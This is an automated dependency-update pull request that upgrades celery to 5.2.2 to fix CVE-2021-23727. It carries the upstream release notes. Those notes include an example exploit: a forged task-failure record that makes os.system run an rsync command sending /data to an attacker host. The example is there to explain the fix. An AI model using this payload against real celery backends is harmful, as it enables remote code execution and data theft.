chore(deps): update dependency celery to v5 [security]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
celery (source, changelog)	`==4.4.7` -> `==5.2.2`

GitHub Vulnerability Alerts

CVE-2021-23727

This affects the package celery before 5.2.2. It by default trusts the messages and metadata stored in backends (result stores). When reading task metadata from the backend, the data is deserialized. Given that an attacker can gain access to, or somehow manipulate the metadata within a celery backend, they could trigger a stored command injection vulnerability and potentially gain further access to the system.

Release Notes

celery/celery (celery)

### [`v5.2.2`](https://redirect.github.com/celery/celery/blob/HEAD/Changelog.rst#522) [Compare Source](https://redirect.github.com/celery/celery/compare/v5.2.1...v5.2.2) \===== :release-date: 2021-12-26 16:30 P.M UTC+2:00 :release-by: Omer Katz - Various documentation fixes. - Fix CVE-2021-23727 (Stored Command Injection security vulnerability). When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in [#4836](https://redirect.github.com/celery/celery/issues/4836). If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: `os.system("rsync /data attacker@192.168.56.100:~/data")` by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload `rsync /data attacker@192.168.56.100:~/data` as the exception arguments like so: .. code-block:: python { "exc_module": "os", 'exc_type': "system", "exc_message": "rsync /data attacker@192.168.56.100:~/data" } According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading. .. \_version-5.2.1: ### [`v5.2.1`](https://redirect.github.com/celery/celery/blob/HEAD/Changelog.rst#521) [Compare Source](https://redirect.github.com/celery/celery/compare/v5.2.0...v5.2.1) \===== :release-date: 2021-11-16 8.55 P.M UTC+6:00 :release-by: Asif Saif Uddin - Fix rstrip usage on bytes instance in ProxyLogger. - Pass logfile to ExecStop in celery.service example systemd file. - fix: reduce latency of AsyncResult.get under gevent ([#7052](https://redirect.github.com/celery/celery/issues/7052)) - Limit redis version: <4.0.0. - Bump min kombu version to 5.2.2. - Change pytz>dev to a PEP 440 compliant pytz>0.dev.0. - Remove dependency to case ([#7077](https://redirect.github.com/celery/celery/issues/7077)). - fix: task expiration is timezone aware if needed ([#7065](https://redirect.github.com/celery/celery/issues/7065)). - Initial testing of pypy-3.8 beta to CI. - Docs, CI & tests cleanups. .. \_version-5.2.0: ### [`v5.2.0`](https://redirect.github.com/celery/celery/blob/HEAD/Changelog.rst#520) [Compare Source](https://redirect.github.com/celery/celery/compare/v5.1.2...v5.2.0) \===== :release-date: 2021-11-08 7.15 A.M UTC+6:00 :release-by: Asif Saif Uddin - Prevent from subscribing to empty channels ([#7040](https://redirect.github.com/celery/celery/issues/7040)) - fix register_task method. - Fire task failure signal on final reject ([#6980](https://redirect.github.com/celery/celery/issues/6980)) - Limit pymongo version: <3.12.1 ([#7041](https://redirect.github.com/celery/celery/issues/7041)) - Bump min kombu version to 5.2.1 .. \_version-5.2.0rc2: ### [`v5.1.2`](https://redirect.github.com/celery/celery/releases/tag/v5.1.2) [Compare Source](https://redirect.github.com/celery/celery/compare/v5.1.1...v5.1.2) Release date: 2021-06-28 16.15 P.M UTC+3:00 Release by: Omer Katz - When chords fail, correctly call errbacks. ([#6814](https://redirect.github.com/celery/celery/issues/6814)) > We had a special case for calling errbacks when a chord failed > which assumed they were old style. This change ensures that we > call the proper errback dispatch method which understands new and > old style errbacks, and adds test to confirm that things behave as > one might expect now. - Avoid using the `Event.isSet()` deprecated alias. ([#6824](https://redirect.github.com/celery/celery/issues/6824)) - Reintroduce sys.argv default behaviour for `Celery.start()`. ([#6825](https://redirect.github.com/celery/celery/issues/6825)) ### [`v5.1.1`](https://redirect.github.com/celery/celery/releases/tag/v5.1.1) [Compare Source](https://redirect.github.com/celery/celery/compare/v5.1.0...v5.1.1) Release date: 2021-06-17 16.10 P.M UTC+3:00 Release by: Omer Katz - Fix `--pool=threads` support in command line options parsing. ([#6787](https://redirect.github.com/celery/celery/issues/6787)) - Fix `LoggingProxy.write()` return type. ([#6791](https://redirect.github.com/celery/celery/issues/6791)) - Couchdb key is now always coerced into a string. ([#6781](https://redirect.github.com/celery/celery/issues/6781)) - grp is no longer imported unconditionally. (#6804) : This fixes a regression in 5.1.0 when running Celery in non-unix systems. - Ensure regen utility class gets marked as done when concertised. ([#6789](https://redirect.github.com/celery/celery/issues/6789)) - Preserve call/errbacks of replaced tasks. ([#6770](https://redirect.github.com/celery/celery/issues/6770)) - Use single-lookahead for regen consumption. ([#6799](https://redirect.github.com/celery/celery/issues/6799)) - Revoked tasks are no longer incorrectly marked as retried. ([#6812](https://redirect.github.com/celery/celery/issues/6812), [#6816](https://redirect.github.com/celery/celery/issues/6816)) ### [`v5.1.0`](https://redirect.github.com/celery/celery/releases/tag/v5.1.0) [Compare Source](https://redirect.github.com/celery/celery/compare/v5.0.6...v5.1.0) Release date: 2021-05-23 19.20 P.M UTC+3:00 Release by: Omer Katz - `celery -A app events -c camera` now works as expected. ([#6774](https://redirect.github.com/celery/celery/issues/6774)) - Bump minimum required Kombu version to 5.1.0. ### [`v5.0.6`](https://redirect.github.com/celery/celery/compare/v5.0.5...v5.0.6) [Compare Source](https://redirect.github.com/celery/celery/compare/v5.0.5...v5.0.6) ### [`v5.0.5`](https://redirect.github.com/celery/celery/compare/v5.0.4...v5.0.5) [Compare Source](https://redirect.github.com/celery/celery/compare/v5.0.4...v5.0.5) ### [`v5.0.4`](https://redirect.github.com/celery/celery/compare/v5.0.3...v5.0.4) [Compare Source](https://redirect.github.com/celery/celery/compare/v5.0.3...v5.0.4) ### [`v5.0.3`](https://redirect.github.com/celery/celery/compare/v5.0.2...v5.0.3) [Compare Source](https://redirect.github.com/celery/celery/compare/v5.0.2...v5.0.3) ### [`v5.0.2`](https://redirect.github.com/celery/celery/compare/v5.0.1...v5.0.2) [Compare Source](https://redirect.github.com/celery/celery/compare/v5.0.1...v5.0.2) ### [`v5.0.1`](https://redirect.github.com/celery/celery/compare/v5.0.0...v5.0.1) [Compare Source](https://redirect.github.com/celery/celery/compare/v5.0.0...v5.0.1) ### [`v5.0.0`](https://redirect.github.com/celery/celery/compare/v4.4.7...v5.0.0) [Compare Source](https://redirect.github.com/celery/celery/compare/v4.4.7...v5.0.0)

Configuration

📅 Schedule: Branch creation - "" in timezone UTC, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

[ ] If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

stencila / hub